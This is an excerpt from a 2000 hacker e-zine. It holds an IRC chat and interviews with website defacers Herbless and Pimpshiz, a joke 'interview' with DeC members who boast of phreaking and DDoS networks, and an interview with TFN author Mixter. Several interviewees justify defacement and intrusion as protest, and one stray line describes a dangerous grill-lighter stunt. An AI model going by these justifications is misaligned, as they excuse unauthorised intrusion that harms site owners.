[06:01am] hehe
[06:01am] heh
[06:01am] PhantasmP
[06:01am] did you put your age somewhere?
[06:01am] i cant open this box
[06:01am] yeh
[06:01am] actually
[06:01am] i'm 36 now
[06:01am] but we'll keep it at 35
[06:01am] k?
[06:01am] no prob, its only 6 hours into a new day
[06:02am] age 4+
[06:02am] how the fuck would a 4 yr old handle this
[06:02am] hrm
[06:02am] they'd have their parents do it
[06:02am] they're asleep
[06:02am] ok
[06:03am] i'm gonna get my switchblade
[06:03am] and cut the twist ties
[06:03am] wake them up, and act all excited like your 4 on christmas morning
[06:03am] actually FProphet and Dicentra got me this
[06:04am] my bro and his fiancee
[06:04am] maybe they tampered with it to make it hard for you to open
[06:04am] thats what i'm thinking
[06:04am] its like that movie 'the game'
[06:04am] and this is my game
[06:04am] but it wouldn't be worth it if they wern't they to see you struggle
[06:04am] brb
[06:05am] i have this feeling someone is logging this
[06:06am] its 6:13am and the box is open but the dog is still inside
[06:06am] i
[06:06am] ll keep u posted
[06:06am] if you need moral support, i'll be here
[06:06am] cant find my knife
[06:06am] shit, it stinks outside
[06:07am] * Cruciphux rests again
[06:08am] how come furby babies you have to be 6+ and the dog is 4+
[06:09am] *** Quits: Oj1st (Ping timeout: 180 seconds)
[06:10am] furby looks scary
[06:13am] furby checkout http://20x.x8x.231.41/ again
[06:13am] err Cruci I mean
[06:13am] if you have time
[06:16am] 6:24am
[06:16am] its out
[06:16am] * PhantasmP claps

322.0 [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ - Session Start - (EDITED SLIGHTLY) -]

(c) 2000 by PhantasmP of HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Mailto: media@hwa-security.net

Thanks to: Herbless for replying back with the answers so quickly and raist & I0wnzz([n]crypt) for providing the first 3 questions.

http://hwa-security.net - #hwa-security on EFNet

>1. How did you get started in defacing?
I've always been a computer geek, and I was playing with security vulnerabilities and other people's networks, when I thought "hey, I could use this to spread my thoughts around". I've usually got something to say on most subjects and felt that I could use this new technology to spread my thoughts around. It would appear to have started something akin to a cult following.

>2. What's the reasoning behind your defacements?

I have various reasons, most of which are apparent on the websites I deface. In the past I've posted messages and info on DeCSS, smoking and government hypocrisy and most recently, I've supported the fuel protests in Britain. I do these things because I believe in them; I think they are right. In the future, I may do something against paedophilia and also racism because these are blights of the human mind and should be stamped out. Ignorance is no excuse for persecution.

>3. Why do you do high risk defacements?

High risk sites come with a high profile - they get my message to the masses. Of course, it could be that I enjoy the attention at a distance... kind of infamous, but anonymous. I suppose there is a perverse kind of satisfaction to that.

>4. Were you expecting the amount of media coverage that you're getting?

Ha ha. No. It's come as a complete surprise. However, that means that I just have to be careful what subjects I choose to speak about - if I target the message to the media and hence the people, it could help the causes that I believe in. In this case, the government's stance on petrol tax and the protestors associated with it.

>5. Do you think having that media coverage is helping your "cause"?

It's hard to be objective about it. At the very least, I have seen only one negative story about my defacements (although of course there may be more). Also, I've had such an incredible response from the public - not just geeks and hackers - that I believe the media coverage has indeed helped.

>6. Do you feel that too many people deface for wrong/dumb reasons?

Definitely. Most people (read: kids) deface for no other reason than to spread their name across any site they can. They pick irrelevant sites, post badly spelled pages, use abusive and offensive language and generally get on my tits. Why? Because of the few that actually have a talent and understand the principles behind system hacking/cracking, the majority seem to waste their hard-earned skills on "3l33t h4x0r sp34k" and sending "fuck-yous" to people that "d1sr3sp3t th3!r 5h!t". Bah. Tossers. They could use their skills to protest about things they believe in, using what I believe is a legitimate form of protest. Of course, there are a few exceptions to this rule; G-Force Pakistan for one - they are against the violence and murder in Kashmir and deserve more publicity than I, for their cause is to awaken the world to pain, torture, rape, murder and suffering that is being ignored by the western world.

>7. How do you feel your defacements are different?

For the most part, they are well thought-out and have a definite purpose. I also try to ensure correct spelling and good grammar. Most defacements ignore these basic principles, giving the impression of stupidity on the part of the cracker.

>8. Do you have any role models in the "underground" community?

I have no role models in any community. I respect some people (for example, Bruce Schneier, the L0pht and to a lesser extent, G-Force who lower their image by using racist slurs), but certainly don't base my actions around those of another. I would like to think I am original and different from the mainstream.

>9. Do you ever worry about getting arrested?

Yes. I really don't fancy sharing a cell with a big homo called Bubba. I take sensible precautions to avoid getting caught, although if law-enforcement is determined to catch me they will. This is because contrary to popular opinion, they are bigger, collectively smarter and have more resources than I. I know that for every site I deface I increase my chances of getting caught, and try to cover my tracks as much as possible. Sometime soon I will have to stop for good, become a good grey-hat kinda guy and behave myself, or I'm going to be facing a few years care of her Majesty the Queen.

=====
Old programmers never die. They just terminate and stay resident.
http://phantasm.8m.com

[END]

@HWA

323.0 [HWA] Interview with Pimpshiz in limelight recently by SugarKing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is an interview with 'pimpshiz' who reportedly defaced over 60 sites in a pro-napster social disobedience action. The cracker has been in mainstream media and mentioned on HNN; SugarKing was able to get this interview for your enlightenment and edification, enjoy - Cruci.

(c) 2000 by SugarKing/HWA-Security please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks Cruciphux/HWA Mailto: media@hwa-security.net

[ - Session Start - (EDITED SLIGHTLY) -]

SugarKing: getting quite the media attention eh?
Pimpshiz: why do you say that
SugarKing: haha, don't you read HNN?
Pimpshiz: no
SugarKing: well you're on alot
Pimpshiz: oh lol
Pimpshiz: yeah but that intern talks shit
Pimpshiz: pyle or whatever
SugarKing: APB News did an article on you
SugarKing: are you really an 11 year-old?
Pimpshiz: no lol
SugarKing: lol yeah I figured that
SugarKing: you shouldn't of left your aol account on your defacements
Pimpshiz: too late
SugarKing: yep
SugarKing: you're gonna get busted dude, heh
SugarKing: by doing that
Pimpshiz: maybe
SugarKing: maybe if they don't wish to pursue you, but if they want to they are gonna get you
Pimpshiz: yeah
SugarKing: i haven't seen you deface lately, all done?
Pimpshiz: yeah, for the time being
SugarKing: good idea
Pimpshiz: hheheehe
SugarKing: As if the pro-Napster defacements of random web sites weren't silly enough already, there's a new twist in the case.
The individual who claims responsibility for the attacks (a.k.a. Pimpshiz -- now also claiming to be an 11 year-old girl) warns officials that his/her/its arrest will lead to revenge attacks by his/her/its buddies. If the threats have any truth to them, they will only lead to more charges against the vandal.
SugarKing: heh
SugarKing: http://www.apbnews.com/newscenter/breakingnews/2000/08/18/hacker0818_01.html
SugarKing: there's one story on you
Pimpshiz: i already read that
Pimpshiz: got anymore?
SugarKing: lemme look
Pimpshiz: k
SugarKing: http://dailynews.yahoo.com/h/zd/20000817/tc/napster_fan_hacks_dozens_of_sites_2.html
Pimpshiz: got it
Pimpshiz: same as the apbnews one isnt it
SugarKing: not really
SugarKing: they say similiar things, but different site and article
Pimpshiz: any others?
SugarKing: hmm no
Pimpshiz: k
Pimpshiz: someone found a CNN one on me yesterday
SugarKing: oh
Pimpshiz: pcworld, computerworld
Pimpshiz: zdnet
Pimpshiz: internet.com wants to interview me on their radio station today
SugarKing: and are you going to?
Pimpshiz: not sure yet
SugarKing: honestly, I wouldn't
SugarKing: unless you plan on telling them your done defacing
Pimpshiz: yeah, dunno cus what if they ask me somethin unexpected that i cant answer
SugarKing: yeah that too
Pimpshiz: but then again
Pimpshiz: it'd be just tite
Pimpshiz: to give shouts at the end
SugarKing: hahah, it's gonna be tight when your ass is caught by the FBI
Pimpshiz: hehehe yeah
Pimpshiz: ill be like "yo lemme get shouts to my boys in the west, RSH, hackweiser, the FBI, the CIA, the NIPC"
Pimpshiz: ;x
SugarKing: haha
SugarKing: i've never heard of you till this napster thing, your obviously new to the scene
Pimpshiz: what scene
Pimpshiz: defacing scene?
SugarKing: yeah
Pimpshiz: lol
Pimpshiz: yeah, but to everything else im from 95
Pimpshiz: been programming since 96
SugarKing: oh so you program?
Pimpshiz: lol yes
Pimpshiz: im certified professional in like 6 things
SugarKing: so you're not just another NT kiddie?
Pimpshiz: id show you my online transcript but it has my personal info
Pimpshiz: and no
Pimpshiz: lol
Pimpshiz: i guess not
SugarKing: 11 year-old girl, lol....so your not in your teens either I imagine?
Pimpshiz: im 16
Pimpshiz: not 11
Pimpshiz: and im a guy
SugarKing: hahah i figured that
SugarKing: i don't think an 11 year-old girl can hack nasa
Pimpshiz: hehehe
SugarKing: He wrote in a series of e-mails to ZDNet News that hacking the sites was easy and he was able to exploit "obvious" holes.
SugarKing: what did you exploit anyways?
Pimpshiz: hahaha that was a lie
Pimpshiz: i didnt write that shit
SugarKing: haha
Pimpshiz: thats hellllllllla funny
Pimpshiz: cus it sure as fuck was not easy rofl
SugarKing: i don't think it was a common hole anyways
SugarKing: yeah i would figure that
Pimpshiz: its undocumented
SugarKing: you find it yourself?
SugarKing: the hole
Pimpshiz: yeah
SugarKing: cool
SugarKing: The alleged hacktivist who may have defaced as many as 60 Web sites in the past week with a Pro-Napster screed now warns that fellow hackers will unleash widespread cyberattacks if federal authorities attempt to collar any suspects.
SugarKing: lol you say that one?
Pimpshiz: yeah
Pimpshiz: but i didnt conspire it
Pimpshiz: someone told me and i relayed it
SugarKing: ah
SugarKing: Ray Kaplan, a computer security consultant at Guardent Inc. in St. Paul, Minn., said the defacements appear to be nothing new or original. It's the same old penetration, he said. You figure out what software people are running, and go find the exploit and take advantage of it.
SugarKing: lol
Pimpshiz: lol yeah, even microsoft thinks im using the SQL default pw
SugarKing: hah
SugarKing: so when do you plan on clarifying all these things, own exploit, not 11 year-old, etc
Pimpshiz: dunno yet
SugarKing666: http://www.hwa-security.net/index0.html mind if I clarify some of it on there? i won't if you don't want to
Pimpshiz: yeah go ahead
SugarKing: cool thanks
SugarKing: what is service is your exploit for?
Pimpshiz: cant say
Pimpshiz: no details.

END

(c) 2000 SugarKing/HWA-Security

@HWA

324.0 [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I know its a waste of space but it belongs here nonetheless. They can get off in knowing their silliness made it into the zine as promised =)

Prelude

This "interview" was requested by members of DeC. It is one of the most elite I have ever done or seen, it surely makes groups like ADM look completely lame. Done Tuesday Aug 1st 2000. A date to remember indeed. I refrained from adding commentary although it was tempting, I think the text speaks for itself. Enjoy!

---START---

ůíů Value of LOG set to ON y0d00d you guys both DeC? so what's up with this interview? y4h i WANT TO EXPLAIN MY MOTIVES for HACKING didnt say there was one yet :) 000 mode/#intr [+o r00thl3ss] by blame_ AHYO watchit with those smily facez but go ahead and make your statement 0k l1ke eat me heh i hack not for knowledge but POWER ok not to learn but to DESTROY to CONTROl CONTROL i agree what have you hacked d00d coz I never heard of you what have I HACKED? WHAT HAVENT WE HACKED sti.amwe.qow.ei.pan.gov.au for ONE THING MISTER yeah you dont need to be specific oh shyt 0kd00d why the attitude? it makes you seem lame why should poeple come forth about that they've hacked are you for real? y4h well. we're the real deal remember when prohosting.com got rm'd a few years ago yeh ? you guys?
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | r00thl3ss (ruthless@???????.gti.net) (Internic Network) ł ircname : blast blast & leave my gang rag layin on ur face | channels : @#intr ł server : irc.mcs.net (MCSNet Services - (312)803-MCS1) : idle : 0 hours 0 mins 12 secs (signon: Tue Aug 1 14:35:30 2000) th3thtth4t w4z y0!@ ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | blame_ (lurk@???????.gti.net) (Internic Network) ł ircname : lock ur windowz, close ur doorz | channels : @#intr ł server : irc.idle.net (Phoenix Rising) : idle : 0 hours 0 mins 5 secs (signon: Tue Aug 1 11:37:42 2000) ermM n0 c0mM3nt 0h y4h i m34n fair nuff heh l1ke was it provoked? 1t w4z s0m30ne elze my lawyer has directed me 2 not say anything incrimin8ng y3z so you said you wanted an interview what do you want to say? w3 g0 w4y b4ck w1th th3 adm1n you're new...how new? he was mad cuz we shut off his fonez acouple times he started runn1ng hiz m0uth 0ff 4nd u kn0w how things are why was he mad at ya? p34ple wh0 p0p sh1t get rm'D SHHH !!! heh i m34n l1ke y4h f0rg3t th4t yah el8 speak can not be used as evidence in court from what i understand anyway so how many people in this group? just you two? so dont worry d00d! 0h y4h s0 anywayz i dont narq man h0w ab0ut th4t intrv1ew d00d? thought we were attempting one now *g* we're el8 and sh1t yah we r how old are ya? how many members? ill say hell0? 000 NetSplit: irc.etsmtl.ca split from irc.total.net [04:11pm] ůíů BitchX: Press Ctrl-F to see who left Ctrl-E to change to [irc.etsmtl.ca] u there br0? CrUCIpHix?? Cruciphux where you located? U.S? [ctcp(#intr)] PING y0d00d by not responding, you're disrespecting uz and as u can see th4t'z n0t wh4t u w4nn4b3 d01nG buDDY ib cable bloc sync dropped its shit actually dude uHh 50 at the m0m3nt 000 CTCP PING reply from r00thl3ss: 47.678 seconds y3z all 0ver the w0rld im also an op in one of the most PRESTEGIOUS UNDERGROUND IRC CHANNELS #phrack ! 
i've asked a bunch of questions and you guys didn't answer don't blame me the net is fux0red ok y4h that t00 curr3ntly so answer the questions how long ya been around? [ctcp(#intr)] PING we h4v3 m3mb3rz fr0m all 0ver the w0rld each m3mber has their 0wn t4l3nt f0r ex4mpl3 maybe we should reschedule this i keep dropping out unless you're packetting which i assume not [ctcp(#intr)] PING r00thl3ss, can build a blueb0x like no oth3r y0 do u kn0w whut a blueb0x iz? ye$ cuz i c4n expl41n f0r the r34d3rz hell0? wh0a guys i keep dropping out hahaha [ctcp(#intr)] PING hes in #velcro thats like the wannabe BoW chan i was invited n0 it'z n0t no idea what its about 000 CTCP PING reply from r00thl3ss: 139.547 seconds 000 CTCP PING reply from r00thl3ss: 130.332 seconds ctcp ping replies are 130-139 seconds .. this is pointless IRC log ended Tue Aug 1 16:18:46 2000 ůíů Starting logfile IrcLog IRC log started Tue Aug 1 16:19:33 2000 ůíů Value of LOG set to ON ůíů Cruciphux [hwa@hwa-security.net] has joined #intr ůíů ServerMode/#intr [+nt] by irc.mcs.net ůíů [Users(#intr:1)] [@Cruciphux ] ůíů Channel #intr was created at Tue Aug 1 16:27:07 2000 ůíů BitchX: Join to #intr was synced in 2.266 secs!! 
ůíů Cruciphux [hwa@hwa-security.net] has left #intr [] ůíů Cruciphux [hwa@hwa-security.net] has joined #phrack ůíů [Users(#phrack:71)] [ Cruciphux ] [ gweeds ] [ cvx ] [ suid ] [ dnm ] [ TheHated ] [ deb ] [ hegemoOn ] [ jennicide ] [ sl0ppy ] [ live_ ] [ cripto ] [ _angus ] [ MeGaMaCk ] [ phatal ] [ r00thl3ss ] [ prym ] [ sq- ] [ xdm ] [ Kore_Dump ] [ py- ] [ phidias ] [ diphen ] [ PRIAPUS ] [ Yowie ] [ loki ] [ _jerky ] [ oghost ] [ bnd ] [ ajx ] [ _xyg_ ] [ blame_ ] [ SN ] [ awr ] [ kemo ] [ FrontLine ] [ kaotik ] [ dank ] [ plaguez ] [ falken ] [ epic^ ] [ devstderr ] [ spinux ] [ silitek ] [ Sens ] [ eric ] [ no_ana ] [ rufus ] [vpea ] [ segmond ] [ cleb ] [ sub ] [ z3nz ] [ dreck ] [ ju1ce_ ] [ deathinc_ ] [ suave ] [ Neural ] [ Trinity93 ] [ arch ] [ f_jail ] [ Dodger ] [ e10k ] [ interline ] [ arakis_ ] [ Swern ] [ ju1ce- ] [ incr ] [ tyme ] [ n00dle ] [ wilkins ] ůíů [Users(#phrack:21)] [ Veerappan ] [ casret ] [ chriz ] [ kn0wfx ] [ ret- ] [ pm- ] [ ksoze ] [ m4g1c ] [ capnlunch ] [ sh1fty ] [ felix ] [ _GNU_ ] [ Codiak ] [ str8niga ] [ ^2muchSun ] [ codemonky ] [ maam0gr4m ] [ woyzeck ] [ NNY ] [ alia ] [ ii ] ůíů Channel #phrack was created at Thu Jul 13 15:49:35 2000 ůíů BitchX: Join to #phrack was synced in 2.306 secs!! yo i'm lagged to fuck These next couple steps need to be done very rapidly. Open the grill lid, stick your head into the grill and light your lighter right next to your head. The result will be a very fast burning fireball that will burn all of the hair off of your head. they dotn call me butternuts jsut because i like to dip my balls in butter... this web page rules [msg(blame_)] go back to #intr for a sec ůíů Cruciphux [hwa@hwa-security.net] has left #phrack [] ůíů Cruciphux [hwa@hwa-security.net] has joined #intr ůíů ServerMode/#intr [+nt] by irc.mcs.net ůíů [Users(#intr:1)] [@Cruciphux ] ůíů Channel #intr was created at Tue Aug 1 16:28:33 2000 ůíů BitchX: Join to #intr was synced in 2.246 secs!! 
ůíů Topic (#intr): changed by Cruciphux: lagged to fuck lets reschedule ůíů blame_ [lurk@????????.gti.net] has joined #intr ůíů suave [g@?????ST.net] has joined #intr sup y0d00dz i'm lagged to fuck yo lets reschedule i brought my bro suave sup blame he's DEC word not much dude DeC4life w0rD y0 so how about th1 interv13w y0? erm th1z i'm lagged to fuck lets reschedule are you seeing this hm look dude yes i'm kinda preessed for time wanna do email? get on another machine & do it bro cant gimme a ime i'll see if i can fit it into m schedule my ok what kinda questions r u gonna ask do u have a fone # i can reach u @? you give me a time if you're pressed no email? ůíů r00thl3ss [ruthless@???????.gti.net] has joined #intr naw i d0nt d0 em41l y0 sup r00thl3ss yo d00D whats the dealeo you have no anonymous email? i keep dropping out my cable is shit email is not sekure! uh ya i was getting ping times of 139 seconds ya not with carnivore around man did u hear aobut that shit i refuse to use email, the government could be watching yah u n3v3r kn0w i heard about it on the radio like they dont sniff efnet? n.p.r. ha lets try this while i'm online ůíů [Users(#intr:4)] [ r00thl3ss ] [ suave ] [ blame_ ] [@Cruciphux ] 0k s0undz g00d ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | r00thl3ss (ruthless@????????.gti.net) (Internic Network) ł ircname : blast blast & leave my gang rag layin on ur face | channels : #intr ł server : irc.mcs.net (MCSNet Services - (312)803-MCS1) : idle : 0 hours 0 mins 28 secs (signon: Tue Aug 1 14:35:30 2000) ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | suave (g@?????ST.net) (Internic Network) ł ircname : gangster of love | channels : #intr ł server : irc.idle.net (Phoenix Rising) : idle : 0 hours 0 mins 44 secs (signon: Mon Jul 31 04:52:20 2000) Ok question 1 is? 
┌─────---─--──-──────---─--──-─────────--- -- -
| blame_ (lurk@???????.gti.net) (Internic Network)
│ ircname  : lock ur windowz, close ur doorz
| channels : #intr
│ server   : irc.idle.net (Phoenix Rising)
: idle     : 0 hours 0 mins 9 secs (signon: Tue Aug 1 11:37:42 2000)
how long you guys been around? y0 1m r34dy $ho0t 10 yearz n0w 10 yrs next week and what does DeC stand for? ya i been around 10 years digital electronic crips deadly electronic cripz how many members? yah deadly yah over 50 woah at last count we're like the digital version of the cripz and stuff like 5 th@ r inner circle tho thats bigger than most i'm sure u've heard of the cripz before we have ties 2 the real crips what is your credo? yes & bloods so you're ca? we pull shit 4 them on the net cc? some of us r y4h but you hack too ya some defacing? y4h $ure naw so nothing on attrition ok what do you want to tell people uh well pr3tty much that we're k00l3r th4n u uhhhh oh yah ... and dont fuck with uz ok or we'll rm u suave we r in2 way more hardcore shit than defacing dude sup do u have anything to add yo? ya back the fuck up b4 u get slapped the fuck up ok back back the fuck up b4 u get hacked the fuck up well I don't know what to ask you guys to be honest if you're into shit you don't want to talk about its difficult to ask questions... im in2 girls so you guys just talk away me 2 lol chicks say i look gr8 in blue you do shit offline? $ure phreaking? i look gr8 in all colours yah phreak1ng yah im a major field phreaker we're bad ass own any switches? no comment! u mean like beige boxing ha ya 4 sure beige boxing is fucking lame switches what r those r00thl3ss is pretty wiacked with a beige box i have a blotto box erm wicked you're into phreaking and dunno what a switch is? yah i am you're pulling my leg those thingz are cool whats a dms 250 oh shiyt ok i remember now hmm i dunno w8 dms? wtf is that? whats a blue box? a dms 250 is a switch what does dropping a card mean?
4 phones & shit a dms250 is a tandem switch? what tone seizes a trunk? blueboxes get u free calls thats where u drop a CC on irc 2stealk0d3z 2600 2600hz 2400+2600 under c5 u can do it w/.a rice krispies whistle 26000 under r1 erm 2600 only on switches not on the SS7 network! ala cap'n krunch right oh ya capn crunch been a while since i phreaked bro crucphix u know 5ess? do you phreak for 'business' or fun haha! crucphix iz lame! its cruciphux im really in2 unix cruciphix fun & prophet! you're lame
*** Cruciphux [hwa@hwa-security.net] has left #intr []
*** BitchX: You are now talking to channel #hwa.hax0r.news
>>> blame_ Invites You to #intr
*** BitchX: Press Ctrl-K to join #intr
*** Cruciphux [hwa@hwa-security.net] has joined #intr
*** Topic (#intr): lagged to fuck lets reschedule
*** Topic (#intr): set by Cruciphux at Tue Aug 1 16:28:55 2000
*** [Users(#intr:4)] [ Cruciphux ] [ r00thl3ss ] [ suave ] [ blame_ ]
*** Channel #intr was created at Tue Aug 1 16:28:33 2000
*** BitchX: Join to #intr was synced in 2.240 secs!!
yo sup bro y0 cruciphux y0d00d you gonna be serious? what's up sure yah i was being serious dude or am i wasting my time ya blme_ wasnt but hes a goofball im always serious so what are you into tell me the scoop man im in2 unix blames a bong tokin alcoholic so forgive him yah i know unix too DoSing? the ins & outs or pure owning? im in2 net shit & sometimes i cruise the X.25 highway nah i said unix not DOS how many shells you got depends how im feelin y u wanna trade DoS - denial of service no oh u mean DoS i'm legit now yeh i got some virgin T3's that r eggable oic i have tons of shells pure owning thats kewl man every1 ends up legit u know do you have like a tfn net or shit once u reach that level of elitness and u just plateau a tfn net?
ok earlier i asked how old you are generally we have many tribe flood network im 29 i have hundreds of t3's on my tfn its distributed denial of service i use tfn2k tho bro its got more features ohyah what about tfn3000 we at DeC are all about tfn2k heh cruciphux are u in2 fones dude? used to be u ever hack a switch? but i'm supposed to be interviewing you ha sounds like a no 2 me oh ok well u know MoD? if you're gonna act like dorks and not answer questions im in MoD/LoD then what the fuck am I doing here? so's blame & suave yah this is incredibly lame actually only im in LoD but we're all in MoD uh y you seem to know shit you've told me nothing dont answer questions whut do u wanna know? and want me to print this? ask me something technical about switches! you're ops in #phrack? just be like yah of course we're ops in #phrack you said before you didnt know what a switch or dms was lol you said thats like beige boxing right i was kidding 2nd chance! cruciphux sup well tell me something heh "DeC - super-underground, fuck with them & get rmd" E0F thats it? ok i'll publish that any props? ok so lets talk about shells ya props 2 me & my crew (Dec) yaaah uhhh ok disses? ;) yah PHRACK everybody disses 2 phrack gH everybody especially PHRACK you guys do drugs? phrack HWA keelber elves sSH all those lam0rz yah sure im str8 edge props 2 Rootshell Hackers from blame btw yah disses to HWA ya im sXe too actually anything else? scratch that propz to the rSH # # #### # # ###### # # # # #### # ##### # # # # oh yah be like "HWA iz gay" "DeC is gr8" ... that all? 
# # # # # #### # # ###### # # # # ## # # # # # # ###### # # # # yah sure ok tnx crucipheux also make sure u mention this # # # ## # ###### # # ## ## # # # # # # # # # #### # # this was quite the interview aempire is a fag # #### # # # # # # #### man do ui have any more q's 4 me about shells or beige oxingh im willing 2 answer nething #### ## # # # # # # # # # # # # # ### ###### # # # # # # did you guys come from AOL originally? you like scrolling #### # # # haaha cruciSUX disses to cruciphux yah quiz us i did! lol aol is for lamers so is scrolling oh shyT misfire i didnt really! aol is all lamers dude lol i got kicked off aol for aolhell GAY-OL HAhA k tnx for nothin me 2 dude!
*** Cruciphux [hwa@hwa-security.net] has left #intr []
[suave(g@U????T.net)] yo whens the interview gonn a be released
[msg(suave)] lol
[msg(suave)] next issue
[msg(suave)] should be a smash hit
[suave(g@U????T.net)] awesome man it was agr8 interview i feel agood about it and it was kewl meeting u
[msg(suave)] heh ok man
[msg(suave)] it was funny
[msg(suave)] cheers
[suave(g@U????T.net)] whens it coming out btw
[msg(suave)] not sure i'm kinda busy
[suave(g@U?????T.net)] ok bro let us know k
[msg(suave)] sure
unbelievable man that was supposed to be an "interview" with guys from DeC they know shit couldnt answer simple questions scrolled ascii and just said shit like HWA IZ GAY AN WE IZ GR8 rofl sigh sad totally two of em said two different names lol that was a hilarious interview gonna edit it now brb
IRC log ended Tue Aug 1 17:06:24 2000
---END---

Special thanks to jeemjones who pointed out they were taking the piss, I never would have guessed all by myself tnx jj!, i put up with this drivel on occasion and sometimes even listen... who knows someone may say something intelligent one day..
- Cruci @HWA

325.0 [HWA] Interview: Mixter by Cruciphux (NOT SugarKing)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(c) 2000 by HWA-Security. Please credit http://hwa-security.net as source if you use any part or all of this transcript. Thanks.
Mailto: media@hwa-security.net Cruciphux/HWA

Note: Originally published in HWA.hax0r.news issue #53 http://welcome.to/HWA.hax0r.news

Mixter http://mixter.warrior2k.com/
Cruciphux http://welcome.to/HWA.hax0r.news/

Mixter is the author of TFN (Tribe Flood Network), distributed denial-of-service software that was brought into the limelight by Mafiaboy's attacks on some big-name web sites, which effectively shut them down for several hours (but see the correction below: those attacks used mstream, not TFN).

-> Technical Overview:
->
-> See Packetstorm http://packetstorm.securify.com
-> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
->
-> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
-> TFN is a powerful distributed attack tool and backdoor currently
-> being developed and tested on a large number of compromised
-> Unix systems on the Internet.

Sunday afternoon May 21st 2000.

[ For the most part unedited so you can decide what is ]
[ interesting and what isn't; general chatter has been ]
[ removed and hostnames blanked out. ]

***** ADDENDUM/CORRECTION ***************************************************
[ NOTE: I was incorrectly under the assumption at the time of this interview that Mafiaboy used Mixter's code to do his DDoS damage; this turned out to be false. In fact mstream (discussed elsewhere with source code) was used and NOT TFN. My apologies for the inaccuracies. - Cruciphux ]
******************************************************************************

Session Start: Sun May 21 13:13:43 2000
Session Ident: Mixter (mixter@*.net)
[13:19] what inspired you to write the TFN software?
[13:20] what were your goals, thoughts, intended uses
[13:20] :
[13:20] hmm
[13:20] well, I coded it for the same purpose I code everything, because I simply like coding, and now or then you'll create something important
[13:21] if not, coding something is always a new exercise for yourself...
[13:21] you could code something but still not release it publically, was it merely POC or did you expect it to be used?
[13:22] I've heard about these tools on irc like two years ago, at least that people wanted to create them
[13:22] POC=? :)
[13:22] sorry I spend way too little time in usenet etc.
[13:22] Proof Of Concept
[13:22] np
[13:22] o
[13:23] no, the first version was just a nice powerful tool to write up
[13:23] what is your view on the Mafiaboy debacle and how do you feel about your software being used to attack major web sites?
[13:24] it was interesting to see this concept worked, and you could contact hosts at a fast speed and with tunneling through raw packets and all
[13:24] tfn2k, was however a pure POC.. any kiddie who tried to use it will know how buggy it is :)
[13:25] can you explain the concept to us and how it works?
[13:25] I think, when the government and media forces need something to puff out, they'll always find something
[13:25] if it wasnt for the dos attacks, it wouldve been something else
[13:26] I believe all packet kiddies out there should get a life... but they do more damage to irc servers and users than anything else, though
[13:26] true but it was you that made the tool available, they may not otherwise have decided to attack these sites
[13:27] do you feel responsible at all?
[13:28] the plain concept of distributed attacks is to start processes from a lot of hosts, simple as that. in distributed packet flooding, you launch all processes against a single target. theoretically, before all the tools came out, when people just logged on to a lot of shells and run their udp/syn flooders against 1 target, that was the same stuff. what the new programs do, raw tunneling, or encrypted tcp control connections are just feature improvements to the same
[13:28] that they have a big impact on feasibility and speed of distributed attacks and other things like distributed scanning
[13:28] hm ok :)
[13:29] its important to realize that the "authorities" biggest instrument is false guilt
[13:30] people can't withdraw from it, and if they do, they're still being persecuted.. so I believe that people like mafiaboy arent innocent since they knew what they were doing, but simply sitting in front of your home computer and typing in commands can hardly make you a "criminal"
[13:31] would you extend that view to "hacking" also?
[13:31] whats your view on people who deface websites?
[13:32] if you talk about hacking as in breaking into servers, I have no ethical problems with it as long as it is for the cause of improving the security, e.g. patching and/or notifying the people
[13:33] so you are ok with non destructive intrusion so long as you patch the hole you came in through?
[13:33] website defacements in general are destructive, because they can harm companies by destroying their images.. so it isnt something people should do.. exceptions are of course sites that stand for violation human and individual rights
[13:33] what if the system is borrowed to say, host a bot on irc or launch further intrusion attempts?
[13:34] yes I personally believe that socio-political defacements with a valid message are justifiable
[13:34] well, I DONT recommend intrusion at all in these big brotherish times, it's far more easy to do productive, legal work, by working for a company or founding your own one, but lets say I have no problem with it, if no damage is created
[13:35] what other software are you working on presently?
[13:35] if they hack systems to host a bot, that's a pretty clueless and dangerous way... if they HAVE to intrude or if they dont have the small money, the only acceptable way is to contact the administration, notify them of the problem and ask for resources in exchange for securing their site
[13:36] yeah.. it's pretty lame though, when you see some anti-human-rights site defaced, and you have in black on gray one line of text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
[13:36] ;/
[13:37] considering the little cost involved in offering a hacker system resources in exchange for securing a server it seems strange it doesn't happen more often
[13:37] well, security software, auditing software and more.. the problem is I can't disclose that without permission from my employees, and I wouldn't break my agreement
[13:37] err employers
[13:38] you currently are employed in the security field, were you ever a grey-hat?
[13:38] i suppose thats a round about way of asking if you have hacked yourself in the past
[13:38] yes it does.. but the whole thing is based on trust, and if it would become practice that hackers outline vulnerabilities and then get local access (from where they have LOTS of insider attacking possibilities), most people would have a problem trusting them
[13:39] heh.. well yeah, I broke into hosts without permission in the past
[13:39] trust is earned however and the notification of intrusion would be a demonstration of intent
[13:39] at the beginning of my career, I started out with developing eggdrop/tcl (not for takeover, just for defense and fun for the most part)
[13:39] how old are you?
[13:40] that was 2 1/2 years ago.. I hadn't a clue about the legal issues back then, and wasn't even certain if what I was doing is illegal
